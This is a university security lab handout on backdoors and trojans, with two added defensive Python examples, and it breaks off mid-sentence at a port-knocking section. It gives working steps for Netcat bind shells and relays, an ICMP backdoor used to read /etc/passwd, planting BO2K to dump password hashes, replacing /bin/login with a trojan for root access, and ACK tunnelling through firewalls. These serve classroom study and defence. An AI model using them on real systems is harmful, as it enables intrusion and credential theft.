ECE 4112 Internetwork Security
Lab 6: Backdoors and Trojans

Group Number: _________
Member Names: ___________________ _______________________
Date Assigned: October 4, 2005
Date Due: October 11, 2005
Last Edited: November 21, 2005

Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions in the Answer Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the Date Due.

Goal: In this lab you will learn how backdoors can be used to gain access to a computer. You will also see how Trojan programs can be used to create these backdoors.

Summary: This lab consists of four parts. In the first part, you will use Netcat to gain access to a machine. In the second part of the lab, you will examine the properties of a Trojan by using a software package called Virtual Network Computing (VNC). Next, you will be using a Trojan program called Back Orifice 2000.

Background: Read Counter Hack pp. 359-371, 399-422
Good reference website for relays: http://www.ists.dartmouth.edu/IRIA/knowledge_base/linuxinfo/nc-intro.v0.80.htm

Tasks to be performed:
- Create a new XP virtual machine
- Use Netcat to transfer files and create access to machines
- Edit iptables to open ports through the firewall on the Linux host
- Create a relay using Netcat
- Use VNC software on Windows and Linux
- Use Back Orifice software to control a Windows machine
- Set up MS Outlook Express in Windows XP

Lab Scenario: This lab will require you to have a second virtual machine running on your host system. If you haven't already made a copy in one of the previous labs, follow the steps below to make one.

Creating a second Windows XP virtual machine

In VMware the virtual machine files are stored in directories in your root directory by default. You just need to copy all the files from a machine's directory to a new one and then make a new machine using these files.
In your Red Hat WS 4.0 physical machine's /root/vmware directory, make a new directory called winXPProCopy:
#cd /root/vmware
#mkdir winXPProCopy
Copy all the files from the winXPPro directory into this new directory:
#cp winXPPro/*.* winXPProCopy/
This will take some time as the image file is quite large.

Start VMware and click File -> New -> New virtual machine.
1. Choose Custom and click Next.
2. Select the operating system as Windows XP Professional.
3. Change the name of the new machine to winXPProCopy and change the directory to /root/winXPProCopy. Click Next.
4. Click Yes at the warning.
5. Adjust the virtual memory so that you can run all three machines at the same time. Bring it down to 128 MB for now.
6. Select Bridged networking and click Next.
7. Choose "Use an existing virtual disk" and click Next.
8. Click Browse and choose the file called winXPPro.vmdk in the new directory.
9. Click Finish.
This will create a new virtual machine on your host system.

You will need to change the IP address of the new WinXP virtual machine. Change it to the old WinXP machine's address + 1. For example, if the original XP machine was w.x.y.z, change the copy to w.x.y.z+1. To do this:
1. Start the new virtual machine. If it gives you a warning about low memory, just click OK as you won't be using this machine for long.
2. Click Start -> Control Panel -> Network and Internet Connections -> Network Connections.
3. Right-click on Local Area Connection and choose Properties.
4. Select TCP/IP and click Properties.
5. Make your changes and click OK.
6. Use VMware to stop the machine.

Note: This is only a temporary setup and you probably won't use the second XP machine after this lab. We'll call the original machine 'XP Machine 1' and the copy 'XP Machine 2'.

Section 1.
Installing and Using Netcat

Note: Netcat for Linux may be obtained from the web at http://www.atstake.com/research/tools/network_utilities/

Installing Netcat on the Windows machine
Start your main Windows machine (XP 1) and copy the \\57.35.10.10\secure_class\Tools\Windows directory to your computer. Unzip the nc11nt.zip program; it should automatically create a directory called nc11nt. Now, whenever you want to run Netcat, you will have to go into this folder and run it from there (unless you add this directory to the path). Now install Netcat on the other XP machine too (XP 2).

Installing Netcat on the Linux machine
You should already have a file called netcat.tar.gz in your /home/tools directory. If you don't, get it from /mnt/nas4112/Tools/Linux/ after mounting the NAS server. Go into your /home/tools directory and execute the following commands:
#tar xvfz netcat.tar.gz
#cd netcat
#make linux
#cp nc /usr/local/sbin
The last command will allow you to run Netcat without having to specify this directory.

Using Netcat
The executable program on both operating systems is called nc and the options are the same on both systems. To run Netcat in client mode so that it sends data across a network, use
#nc [IP address to send to] [port to send to]
(e.g. nc a.b.c.d 1234 - this sends data to port 1234 on machine a.b.c.d)
All input is through standard in, so whatever you type on the keyboard will be sent to the other machine. Alternatively, if you would like to read data from a file and pipe that through to the other machine, use
#nc [IP address to send to] [port to send to] < [file to read from]
(e.g. nc a.b.c.d 1224 < testfile.txt - this sends the data in testfile.txt)
To stop Netcat, simply press Ctrl+C. There are several different options that Netcat can be run with, depending on what it is being used for.
The most common options are:
-l specifies that Netcat is running in listening mode
-p specifies which port Netcat should listen on
-v verbose mode so that all results are displayed
-w maximum amount of time (in clock ticks) to wait for a response
-z specifies that Netcat should send very minimal data, usually a SYN packet, to see if a response is obtained
-e allows Netcat to execute a program to receive or generate network traffic
Look at the README files on both systems under the Netcat folder to find out more information about running Netcat. Many uses for Netcat are found in the README.

To run Netcat in listen mode, use the -l and -p options. The command syntax would be:
#nc -l -p [port to listen to]
If you want to store the input that is received, you can redirect all the received data to a file using the following command:
#nc -l -p [port to listen to] > [file to write to]
(e.g. nc -l -p 1224 > testfile.txt - whatever is received on port 1224 is written to testfile.txt)
NOTE: If you redirect everything to a file, whatever was previously in that file will be overwritten.

Netcat can also be used to scan ports using the following command (Netcat is being used in client mode for this):
#echo QUIT | nc -v -w [time to wait] -z [IP address to scan] [port range to scan]
(e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 - this will scan ports 1 to 200 on the system with IP address a.b.c.d)

Netcat can also be used to create backdoors on systems. Attackers can push a shell between systems over any TCP or UDP port. The shell will have the privileges of the user that executes Netcat in listener mode on the machine being exploited. For example, if you are on the Linux machine and would like to execute commands on the Windows machine, set up the Netcat listener on the Windows machine with the following command (from the nc11nt directory):
#nc -l -p [port to listen to] -e cmd.exe
(e.g.
nc -l -p 7777 -e cmd.exe - this will pipe all input received at port 7777 to cmd.exe, which will then execute the commands.)
On the client side, simply type
#nc [listening machine] [port to connect to]
(e.g. nc a.b.c.d 7777)
and start typing in your commands.

A fourth popular use of Netcat is to create relays, whereby an attacker uses several intermediate systems while actually attacking a target system. Thus, detecting where the attack originated from is a very painful and sometimes impossible process.

Exercise 1.1: Netcat File Transfer
Use Netcat to transfer the password file from your Linux to your Windows machine. Store the data you receive in passwd.txt. Now try transferring a binary file (e.g. a .rtf file) from the Windows system to the Linux system and then transfer it back to the Windows system, saving it under a different filename.
Q1.1.1. Is the binary file the same, or has it been altered? Compare the file sizes of the file on the two systems as it is transferred back and forth.
Q1.1.2. What can you say about Netcat's ability to transfer binary files?

Exercise 1.2: Netcat Backdoors
This exercise will show you how to use backdoors in Netcat. Create a Netcat backdoor listener on your Windows machine. Use the options to pipe the output to a cmd.exe shell. Select any port number to listen to and connect to this backdoor by running Netcat in client mode on your Linux machine. Now type in some simple DOS commands like dir and mkdir. Then try running some complex commands and examine the extent of information that you can gain from the system.
Q1.1.3. What do you conclude from this?

Exercise 1.3: Netcat Relays
Note: This exercise requires the use of both Windows machines.
In this exercise you will create a relay on your Linux machine using the Netcat listener and client. This relay will forward data from one Windows machine to the other. The Netcat client will be running on the first XP machine while the listener will be running on the second XP machine.
Once established, the relay should allow you to access the second XP machine from the original XP machine.

First create a backdoor shell on the new XP machine, using the Netcat listener. You can create a backdoor shell by
# nc -l -p <listening port> -e cmd.exe
(e.g. nc -l -p 56789 -e cmd.exe)

Creating a relay
A way to create a relay is to tie the input and output of a Netcat listener and client together using a special file type called a FIFO. As its name implies, a FIFO operates in First-In, First-Out mode. You can create a FIFO and use it to link a Netcat listener to a client by typing the following in Linux:
# mknod backpipe p
# nc -l -p [portA] 0<backpipe | nc [target computer] [portB] 1>backpipe
portA - port on which the relay is listening
portB - port on the target machine on which the backdoor shell is listening
target computer - the target XP machine (XP Machine 2). Make sure its IP is different from your other XP machine.
Note: Do not put spaces around the '<' or '>' signs. They redirect the standard input and output streams in Linux into backpipe and cannot have spaces next to them.
e.g. nc -l -p 12345 0<backpipe | nc e.f.g.h 56789 1>backpipe
The line above creates a relay listening on TCP port 12345 and forwards the data to TCP port 56789 of the machine on which the backdoor shell was created.

For this relay to work, you have to allow packets into the listening port on your Linux machine. If the default Linux firewall iptables is running, it won't allow these packets. So disable it by typing
# /etc/init.d/iptables stop
After creating the relay and listener, connect to the relay by typing
#nc [relay machine] [portA]
on the original XP machine. Now try some other commands on the target machine and see what all you can do. Run the command called ipconfig in the shell. This will show you the IP address of the target machine.
Open up another cmd.exe window on your client machine and do ipconfig again to see the IP address of the machine you're connecting from. Position these windows so that both IP addresses are visible. Take a screenshot of these windows and submit it with your report. You can use the "Print Screen" key to capture the screen and then paste it into the Paint application. (Screenshot #1)

Hint: In this exercise, you used Netcat the following four times:
1. As a listener in the relay on your Linux machine
2. As a client in the relay on your Linux machine
3. As a listener, running the shell on the second XP machine
4. As a client on the first XP machine, where commands can be typed to be sent to the relay
Q1.1.4. Draw a diagram explaining how the relay works and the directions of data flow.

Exercise 1.4: Other uses of Netcat
Q1.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways. Suggest another way that Netcat could be used (in detail).
Q1.1.6. What defenses could you use against an attack like a Netcat backdoor?

Section 2. Icmp-backdoor
In this exercise, we are going to use another backdoor that exploits the ICMP protocol to get a remote access shell. You should have two RedHat 7.2 virtual machines running to do this exercise.

If you haven't already, go ahead and connect to the NAS server and copy the file icmp-backdoor.tar.gz (from /mnt/nas4112/Tools/Linux) to both of your virtual machines, and extract the contents with the following command:
# tar zxvf icmp-backdoor.tar.gz
Go into the icmp-backdoor directory.
In one virtual machine, we are going to compile the server part of this program (this machine shall be referred to as the "Server machine") with the command:
#make server
In the other virtual machine, we are going to compile the client part of this program (this machine shall be referred to as the "Client machine") with the command:
#make client
You will need to follow the same copy and extract procedures you did with the other Linux machine.

Next, we are going to start the server program on the Server machine (think of this as installing the backdoor on an infiltrated machine). To do this, run this command:
#./ibd-server 0
The "0" refers to the ICMP type for "Echo reply" packets. We are setting this server to reply back with its output in response to "Echo request" packets. This is important in order to make the connection we want. Refer to Figure 1 to ensure you have run the proper commands up to this point.

Figure 1. Installing and running the icmp-backdoor server.

Next, run Ethereal on your RedHat WS4 machine. When we run commands over this icmp-backdoor connection, we are going to see how data is transferred through the ICMP protocol. In order to run the client and connect to the icmp-backdoor, run the following command on the Client machine (where w.x.y.z is the IP address of the Server machine):
#./ibd-client w.x.y.z 8
The "8" refers to the ICMP type for "Echo request" packets. We are setting this client to send echo requests as input to the icmp-backdoor server. If we did this correctly, we will have a connection established by exploiting the echo-request <-> echo-reply communication of the ICMP protocol. Refer to Figure 2 to ensure you have run the proper commands up to this point.

Figure 2. Installing and running the icmp-backdoor client.

You should be connected by now... so let's do stuff. For example, we ran the ls command, and it shows the directory listing of the Server machine, as shown in Figure 3.

Figure 3.
Running ls on the Server machine through the icmp-backdoor client.

While we're at it, go ahead and run the whoami command just to see what privileges you have. Okay, now let's do something slightly more malicious. While we cannot use programs like vi over this type of connection, we can still run simple commands to retrieve sensitive information. Let's see the password file! To do this, run the command "cat /etc/passwd", which should print out on the client terminal the contents of the password file as shown in Figure 4.

Figure 4. Running cat /etc/passwd to print out the contents of the Server machine's password file.

So if we were a hacker, we could just copy the output from this screen to a text file and then run a password cracker to decipher passwords. Go ahead and have fun running more commands to see what else can be done over this icmp-backdoor. Once you've had your fun, close the connection by running the exit command on the Client machine.

Now go back and stop your Ethereal capture on your RedHat WS4 machine. You should be able to scroll down and see the ICMP packet exchanges that were made due to the commands you ran. Highlight one of these packets by clicking on it, and move the bottom scrollbar to see the contents of the ICMP packet as shown in Figure 5.

Figure 5. Ethereal output showing an ICMP packet due to the backdoor connection.

You should notice that the content of what you saw in your backdoor client is visible in the actual ICMP packets. Go ahead and take a screenshot of the Ethereal output and turn it in with your lab. Just for your information, there are some developer groups that are trying to enhance this type of backdoor by encrypting the ICMP contents and hiding the backdoor server's process id. That is all for this exercise.
Take a screenshot of the Ethereal output (Screenshot #2)
Q2.1.1. What defenses could you use against an attack like the icmp-backdoor?

Section 3.
Installing and Using Virtual Network Computing (VNC)
You can obtain VNC from the web at http://www.realvnc.com/

VNC is an application-level Trojan backdoor. It allows remote access to a system, and can be used for legitimate remote system administration purposes. However, it can also be exploited by hackers, since VNC allows a person to change all configurations that they have permission to change. Typically, the VNC server is installed on the system that is to be remotely administered and the client is installed on the administrator's system. Therefore, if the server was installed by a user with administrator privileges and is running under that account, an attacker that uses the VNC server would have full access to all functions of the system.

Installing and Using VNC on the Windows Machine
Copy the vnc_x86_win32 folder from the NAS server's tools/Windows folder to the tools folder on your hard drive.
1. Change into the vnc_x86_win32/winvnc directory and double-click the Setup program.
2. Click OK on the warning about installation of a previous version.
3. Click Next.
4. Click Yes on the License screen.
5. Click Next for the default destination location.
6. Click Next for the default Program Folder.
7. Click Finish.
To run the Windows VNC server:
1. From the Start menu, select All Programs -> VNC -> Run WinVNC (App Mode).
2. Enter a password to be used for VNC connections. Remember this password as it will be required for access to the VNC server by a client. This password prevents other attackers from using the VNC server.
3. Click OK. The server is now waiting on the Windows machine.
To run the Windows VNC client, simply click on "Run VNCviewer". You will be prompted for the IP address of the system on which the server is running and the password to access that server. Once you have entered both, you should see a GUI come up with a terminal window.
Installing and Running VNC on the Linux Machine
Switch to the /home/tools directory, where you extracted all the Linux tools, and run the following command:
#tar xvfz vnc-3.3.3r2_x86_linux_2.0.tgz
Go into the VNC directory that is created. You will see that there are five different executable programs. Go ahead and read the README file as this will provide you with explanations of what each of the executables does. For example, to run the VNC client, simply type
# ./vncviewer
When prompted for the machine on which the server is running, type in the Windows machine's IP address. At the next prompt, type in the password. You should then see a GUI of the Windows machine appear on the Linux system.

To run the VNC server, you will have to copy the VNC executables into the /usr/local/bin directory. This puts them in the Linux path. To do this type
#cp vnc* /usr/local/bin
#cp Xvnc /usr/local/bin
Then simply type
#vncserver
Establish a password for the connection and remember this to connect to the Linux machine. Make sure that after using VNC on the Linux system, you end each VNC process after completion; otherwise the port that it listens on will be incremented when the next VNC process is created.

NOTE: To make sure that you can connect to the VNC server running on the Linux system, you have to modify iptables to allow connections to TCP port 5901, since this is the port that the VNC server runs on by default. Access to this port is normally blocked (to check this, run nmap against the Linux system) by the built-in firewall in Red Hat. Instructions on how to edit the iptables rules are given below. Note that the change you make to iptables is only temporary and will be lost the next time you reboot the system.
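The note above says vncserver listens on TCP 5901 and that the firewall normally hides that port from nmap. Blocking the port does not remove the listener, though: the socket still exists in the kernel's table, and reading that table from the host is the Linux counterpart of the TCPView check used later in this lab. The following Python is an added example for this lab (it is not part of the handout and not VNC's own code). It parses a socket table in the /proc/net/tcp layout, decodes the kernel's hex, little-endian addresses, and reports every LISTEN socket that is not on an expected list. The sample table is constructed to show sshd on 22, a vncserver on display :1 (5901) and a stray Netcat listener on 7777; which ports count as expected is an assumption of the example.

```python
"""List unexpected TCP listeners from a /proc/net/tcp style socket table.

Added example for this lab (not part of the handout or of VNC). The table
below is constructed to look like /proc/net/tcp on the Linux machine after
`vncserver` started display :1 and a Netcat listener was left on port 7777.
Which ports are expected (here only sshd on 22) is an assumption.
"""

# Constructed sample in the /proc/net/tcp layout. Addresses are hex, with the
# IPv4 part written little-endian by the kernel; state 0A is LISTEN, 01 is
# ESTABLISHED. 0x170D = 5901, 0x1E61 = 7777, 0x0016 = 22.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 f6e3c000 300 0 0 2 -1
   1: 00000000:170D 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5678 1 f6e3c400 300 0 0 2 -1
   2: 00000000:1E61 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9012 1 f6e3c800 300 0 0 2 -1
   3: 0A01A8C0:0016 0B01A8C0:C3D4 01 00000000:00000000 00:00000000 00000000     0        0 3456 1 f6e3cc00 20 4 30 10 -1
"""

TCP_LISTEN = "0A"
EXPECTED_LISTENERS = {22}          # assumption: only sshd is supposed to listen
# VNC display :n listens on 5900 + n (vncserver takes the next free display).
KNOWN_REMOTE_ACCESS_PORTS = {5900 + n: f"VNC display :{n}" for n in range(10)}


def decode_addr(hex_addr):
    """Turn '0A01A8C0:0016' into ('192.168.1.10', 22)."""
    ip_hex, port_hex = hex_addr.split(":")
    # Reverse the byte order: the kernel prints the IPv4 address little-endian.
    octets = [int(ip_hex[i:i + 2], 16) for i in range(6, -1, -2)]
    return ".".join(str(o) for o in octets), int(port_hex, 16)


def listening_sockets(table):
    """Yield (bind_ip, port, uid) for every row in LISTEN state."""
    for line in table.splitlines()[1:]:          # first line is the header
        fields = line.split()
        if len(fields) < 8 or fields[3] != TCP_LISTEN:
            continue
        ip, port = decode_addr(fields[1])
        yield ip, port, int(fields[7])           # column 7 is the owning uid


def audit(table, expected=EXPECTED_LISTENERS):
    """Return the listeners that are not on the expected list, labelled."""
    findings = []
    for ip, port, uid in listening_sockets(table):
        if port in expected:
            continue
        findings.append({
            "bind": f"{ip}:{port}",
            "port": port,
            "uid": uid,
            "label": KNOWN_REMOTE_ACCESS_PORTS.get(port, "unexpected listener"),
        })
    return findings


if __name__ == "__main__":
    # On a real system read open("/proc/net/tcp").read() instead of the sample.
    for f in audit(SAMPLE_PROC_NET_TCP):
        print(f"{f['bind']:<20} uid={f['uid']:<5} {f['label']}")
```

On a live machine, feed it the contents of /proc/net/tcp (and /proc/net/tcp6), then map the inode column to a process with netstat -tlnp or lsof -i to learn which binary owns the socket; that pairing of port and process is the information TCPView presents on Windows. Note that an iptables rule changes only what the network sees; a backdoor that listens on a dropped port is still present in this table.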
Modifying iptables: To allow packets coming in destined for the VNC server, type:
# iptables --insert INPUT --protocol tcp --destination-port 5901 -j ACCEPT
If you still cannot connect from Windows then you might need to enter the exact port you just opened in the firewall. To do this, when you enter the host in VNC viewer, enter host:port, e.g. a.b.c.d:5901
On Windows, you will see another virtual desktop, not the normal user's desktop and mouse movements. Still, even though you cannot see what the normal user is doing, you have remote control of the Linux system from Windows.

Exercise 3.1: Windows VNC Server
Set up a VNC server on your Windows machine and connect to it from your Linux machine using the Linux VNC viewer. Try running a couple of different programs, including the password cracking software. Since you are logged on as an administrator, you should be able to do anything.
Q3.1.1. How would you detect that VNC was installed and/or running on your Windows machine?

Exercise 3.2: Linux VNC Server
Start a VNC server on your Linux machine and try to control it from your Windows machine using the Windows VNC viewer. Run several different programs as well as view the password and shadow files.
Q3.1.2. How would you detect that VNC was installed on your Linux machine?
Take a screenshot of the VNC client screen (Linux) and another of the VNC viewer (Windows) accessing the VNC server. Turn these in with your report. (Screenshots #3, #4)
An easy way to take a screenshot is to press the Print Screen key. A window will come up, asking you for the name of the file. The format PNG is a standard picture format that can be printed from your Linux lab printer or a Windows computer.
Q3.1.3. What defenses could you use against an attack like VNC?

Section 4. BO2K BackDoor
Back Orifice is one of the most well-known Trojan/backdoor applications available.
It is important that you do not transfer this file off of these computers to any ECE machines, as most modern virus scanners will mark this file as malicious. The bo2k_1_0_full file can be copied from the NAS server under the folder Tools\Windows. Copy the file to the desktop of one of your Windows XP virtual machines. Double-click on the program and then run through the installation process.

After installing, open the program "BO2k Configuration Tool". Click Next through the initial startup screen. The next screen allows you to rename the server; you can just keep it named "bo2k.exe" for this lab. The next screen determines whether to use TCP or UDP; just leave it as TCP. Select a port number to run on the next screen (select something over 1024, e.g. 30000). Click Next through the next screen. Enter a passphrase on the next screen; since we chose "XOR", just choose something like "ece4112". Now finish the configuration wizard. Now the real configuration program opens. Click "Open server" and select the file name "bo2k.exe". Now click "Save Server" and exit the program.

Now this bo2k.exe file needs to be transferred to the victim machine using the shared folders available through VMware Tools. To do this:
1. Right-click on the WinXP virtual machine tab in VMware and click Settings. Now click on the Options tab. Click on Shared Folders and make sure that it is enabled. If it isn't, check the Enable Shared Folders checkbox. Now click Add... near the bottom of the window and select the folder which you want to share (suggestion: you might want to create and share a directory called /root/vmware/shared). Enter a name for the shared resource ("Shared Folder").
2. Repeat the above for the XPPro Copy machine.
3. Now open My Computer in the XPPro machine and click Tools -> Map Network Drive.
4. Use the default drive letter for "Drive:" and click Browse to locate the shared folder.
5. Expand VMware Shared Folders and select the folder which you shared in step 1.
6.
Repeat step 4 for the XP Copy machine.
Now, anything copied to the network drive will be available to both machines.

On the victim's machine, double-click the bo2k.exe file you transferred. You have now installed the backdoor on the victim machine. Go back to the Windows copy virtual machine. On the non-server machine, open the BO2k client program. Click File -> New Server, fill in the IP address of your target machine and connect to it. Play around with some of the tools now available to you. Have BO2k list the password hashes for the victim machine and take a screenshot of this.
Screenshot #5: Submit a screenshot of BO2k successfully being used to gain access to the password hashes of the victim machine.

Another such tool to control a remote XP machine is "Let Me Rule" (http://www.pinoyhaker.net/modules.php?name=Downloads&d_op-viewdownload&cid=1#cat). This program packages a lot of the individual tools that we have played with, including a video stream, key logger and an FTP server.

Section 5: Using a Simple Backdoor Program in C
Suppose you want to install a backdoor on a compromised Linux machine. This nifty C program (utrojan.c - see source code below) allows you to hijack login, imapd and/or qpopd. For this exercise, we'll overwrite login and access the victim machine via telnet. The program can be obtained from:
http://packetstormsecurity.org/UNIX/penetration/rootkits/utrojan.c
This program overwrites the /bin/login command. While telnetting to a victim machine, it provides a "1 second time frame" in which you need to enter the password "door". If you enter this correctly, it executes /bin/sh, thereby giving you root access (from any user account installed on the compromised machine). If you don't enter "door" correctly within the time frame, the program defaults to the original login program, saved as /bin/.login.

Make sure that telnet is running on the RH7.2 machine.
On the RH7.2 (victim) machine:
1.
Copy utrojan.c from the Lab6 folder on the NAS to the /bin directory.
2. Go to the /bin directory and back up the login file:
# mv login .login
3. Compile utrojan.c:
# gcc -o login utrojan.c
On a WinXP machine:
1. Open the command line.
2. Telnet into the RH7.2 machine (you may need to start telnet by using ntsysv on the RH7.2 machine and rebooting):
C:\> telnet <ip address>
3. Within 1 second, type "door" and press Enter.
4. You should see the # prompt.
5. Type whoami (you should be root).
Take a screenshot of this remote access. (Screenshot #6)
On your RH7.2 machine, move the backup .login file back to login to stop this backdoor.

Section 6: Backdoor Detection
In the previous sections, we looked at tools that install backdoors on systems. We asked you how you would detect these backdoors. One probable answer is to look for suspicious ports that are listening for connections. How can we do this? There are two Windows tools, TCPView (http://www.softpedia.com/public/cat/10/7/10-7-12.shtml) and Active Ports, that do exactly that.

Download the executable installer for TCPView from the NAS to one of your Windows XP machines. Extract the zip file. Click on Tcpview.exe. Take note of the processes running, the protocols they use, the local and remote addresses, and the state. Now run the Netcat listener by opening a command prompt and typing:
nc -l -p 7777 -e cmd.exe
Look back at TCPView. You should see a new process "nc.exe:xxxx". The local address should be xp:7777 and the state should be LISTENING. Take a screenshot (#7).
Now right-click on the nc.exe process in TCPView and select "Process properties...". You should see a pop-up box with the path of the nc.exe program and also the command line arguments used to execute the program. Take a screenshot (#8).
To end a malicious process, right-click on it and select "End Process...". You have just closed a backdoor.

Section 7: Walking Through Firewalls with ACK Tunneling
In an effort to maintain access to exploited boxes, hackers install backdoors.
You have already seen how a shell can be tunneled over ICMP messages. However, virtually all sysadmins have blocked ICMP at their firewalls. Assuming you have access to the firewall rule set, you could install a regular TCP server daemon and open a hole in the firewall. But such a hole can easily be detected when a sysadmin scans his network. Fortunately, there is an alternative: ACK tunneling.

ACK tunneling does exactly what you would expect: it tunnels network traffic over TCP ACK packets. The key advantage of this is that stateless firewalls allow any packet with the ACK flag set, as they assume such packets belong to a pre-existing connection. This allows us to send the ACK packets right through the firewall and make a connection with the backdoor. Note that this will not work on stateful firewalls, as stateful firewalls keep the state of the active connections. Fortunately, most firewalls are stateless. Stateless firewalls include the Windows firewall, most router/switch firewall boxes, and many high-traffic firewalls, as statefulness is CPU-intensive.

Another advantage of ACK tunneling is that you can ACK scan with nmap through a firewall and find all of the infected machines behind the firewall. So, for example, if you can get the server installed on a bunch of targets in a company via an e-mail worm, then a simple nmap ACK scan of the company from outside the firewall will show all the infected machines. This has the advantage of not having a callback in the server which could reveal the attacker's identity. Lastly, most firewall logging systems only log SYNs; as a result our ACK traffic will not be logged.

Arne Vidstrom has released a proof-of-concept ACK tunneling cmd.exe backdoor called AckCmd. It consists of two parts: the server, which listens on the target box, and the client, which the attacker uses. The client sends from port 80 to the server listening on port 1054. These port numbers look surprisingly like web traffic.
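The two firewall behaviours contrasted above (a stateless filter that trusts the ACK flag and logs only SYNs, versus a stateful filter with a connection table) can be modelled in a few lines. The Python below is an added illustration, not part of the lab and not the AckCmd tool. Both toy filters see the same two flows: the reply to a web connection the inside host opened itself, and an unsolicited ACK-only packet from outside, sent from source port 80 to port 1054, which is the shape of AckCmd traffic. The hosts, ports and flags are constructed for the example.

```python
"""Why an ACK tunnel crosses a stateless packet filter but not a stateful one.

Added example (not from the lab handout and not the AckCmd tool). The two
classes are toy models: the stateless one decides per packet from the TCP
flags, the stateful one keeps a table of connections it has seen opened.
All hosts, ports and flags below are constructed.
"""
from collections import namedtuple

Packet = namedtuple("Packet", "src sport dst dport syn ack")

INSIDE_HOST = "10.0.0.5"      # constructed: the machine behind the firewall
PUBLISHED_PORTS = set()       # nothing is meant to be reachable from outside


class StatelessFilter:
    """No memory: a set ACK flag is taken as proof of an existing connection,
    and, as the handout notes, only SYNs ever reach the log."""

    def __init__(self):
        self.log = []

    def outbound(self, p):
        return "ACCEPT"

    def inbound(self, p):
        if p.ack:
            return "ACCEPT"                      # trusts the flag, asks no questions
        if p.syn and p.dport in PUBLISHED_PORTS:
            return "ACCEPT"
        self.log.append(f"DROP SYN {p.src}:{p.sport} -> {p.dst}:{p.dport}")
        return "DROP"


class StatefulFilter:
    """Connection tracking: an inbound packet is accepted only if it belongs to
    a flow the inside host opened, or is a fresh SYN to a published port."""

    def __init__(self):
        self.conns = set()
        self.log = []

    def outbound(self, p):
        if p.syn and not p.ack:                  # inside host opens a connection
            self.conns.add((p.src, p.sport, p.dst, p.dport))
        return "ACCEPT"

    def inbound(self, p):
        reverse = (p.dst, p.dport, p.src, p.sport)
        if reverse in self.conns:
            return "ACCEPT"                      # reply to a tracked connection
        if p.syn and not p.ack and p.dport in PUBLISHED_PORTS:
            self.conns.add(reverse)
            return "ACCEPT"
        # Every unsolicited packet is dropped and logged, ACK flag or not.
        self.log.append(f"DROP {p.src}:{p.sport} -> {p.dst}:{p.dport} "
                        f"syn={p.syn} ack={p.ack}")
        return "DROP"


def run_scenario():
    """Push the same two flows through both filters and collect the verdicts."""
    legit_syn = Packet(INSIDE_HOST, 40001, "203.0.113.10", 80, syn=True, ack=False)
    legit_reply = Packet("203.0.113.10", 80, INSIDE_HOST, 40001, syn=True, ack=True)
    # AckCmd-shaped probe: ACK-only packet from the outside host's port 80 to 1054.
    ack_probe = Packet("198.51.100.7", 80, INSIDE_HOST, 1054, syn=False, ack=True)

    verdicts = {}
    for name, fw in (("stateless", StatelessFilter()), ("stateful", StatefulFilter())):
        fw.outbound(legit_syn)
        verdicts[name] = {
            "legit_reply": fw.inbound(legit_reply),
            "ack_probe": fw.inbound(ack_probe),
            "log_entries": len(fw.log),
        }
    return verdicts


if __name__ == "__main__":
    for name, result in run_scenario().items():
        print(f"{name:<10} {result}")
```

The stateless filter passes the unsolicited ACK and writes nothing to its log, which is exactly the pair of properties the section relies on; the stateful filter drops the same packet and records it, because no tracked connection matches. That is the argument for preferring connection-tracking firewalls (on Linux, the iptables state match used later in this lab) on any segment where a backdoor might be planted.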
For this demo, you will need two XP machines. Get the file ackcmd.zip from the NAS to both WinXP boxes.
On the victim machine: Unzip ackcmd.zip and run AckCmdS.exe from the command line:
# AckCmdS.exe
On the attacker's machine: Unzip ackcmd.zip. Open Ethereal on your RH WS4 machine and capture this process. Back on the attacking machine, run "AckCmdC.exe <victim IP>" from the command line:
#AckCmdC.exe <victim IP>
#ipconfig
#quit
Take a screenshot (#9) from the attacking machine. Examine the packets in Ethereal. You can kill AckCmdS.exe on the victim's box by pressing Ctrl-Alt-Del, selecting Processes, selecting AckCmdS.exe and clicking End Process.

Section 8: Port Knocking
As you have seen, closing ports at the firewall is one of the best ways to secure a system. Unfortunately, even if you close all unused ports, the services you are offering such as SSH, HTTP, IMAP, etc. must have their ports open to allow connections. However, port knocking allows a server to close *ALL* ports (including those of services offered) while still allowing connections to services. The basic principle is simple: when a user wants to connect to a closed service, he sends packets to multiple closed ports in a secret order. If the port knock sequence is correct, the server acts accordingly, such as by opening a port.

Despite the simplicity of the basic concept, there are several details which deserve discussion. The most important detail is encryption: what happens if someone sniffs your knock sequence? Under our simple description, they could merely replay the sequence and access the service. Fortunately, strong encryption can be integrated into the knock sequence to create a sequence that is just as secure as SSL or SSH. The client and server share a key; the key is then combined with the source IP, port and other data. This data is encrypted and converted into a sequence of protocol/port numbers to knock at.
The server decodes the sequence and acts on the request, for example by explicitly opening the specified port to/from the source IP. Even if an attacker replayed the sequence, data such as the source IP and timestamp would fail to match, resulting in an invalid knock sequence.

It is also worth noting that there is no way to detect a host accepting port knocks. The server drops all packets on the floor and does not even respond to a successful knock; the only sign of success is the open port. Obviously port knocking cannot be used on public services: it would make no sense to require a port knock from everyone to access your public web server. But port knocking does prove very useful for restricted-access hosts.

One related common misconception is that a box which drops packets appears to the world as if it were off or disconnected. Unfortunately, this is not the case. The difference is how the next-hop router responds to the packet. For a box that is connected but dropping all packets, the attacker receives *NO* response. Attempting to connect to a host that is off or nonexistent, however, results in an ICMP Destination Unreachable from the last router before the target. This is because a connected but dropping host still responds to the router's ARP requests, so the host is in the router's ARP table, whereas a host that is off or non-existent has no entry in the router's ARP table and does not respond to ARP requests, resulting in the ICMP packet.

Port knocking actually originated from a virus in which the attacker included a simple port knocking implementation to allow backdoor access to infected machines. When it was first announced as a mainstream security measure, port knocking was heavily criticized as security-through-obscurity. However, with the recent addition of encrypted knock sequences, port knocking is becoming an acceptable additional layer of security. Unfortunately, there are few implementations available and even fewer production-quality releases.
Today we will use a port knocking implementation called fwknop (Firewall Knock Operator) that was released in 2004 at DEFCON 12. According to the fwknop website (http://www.cipherdyne.org/fwknop/):

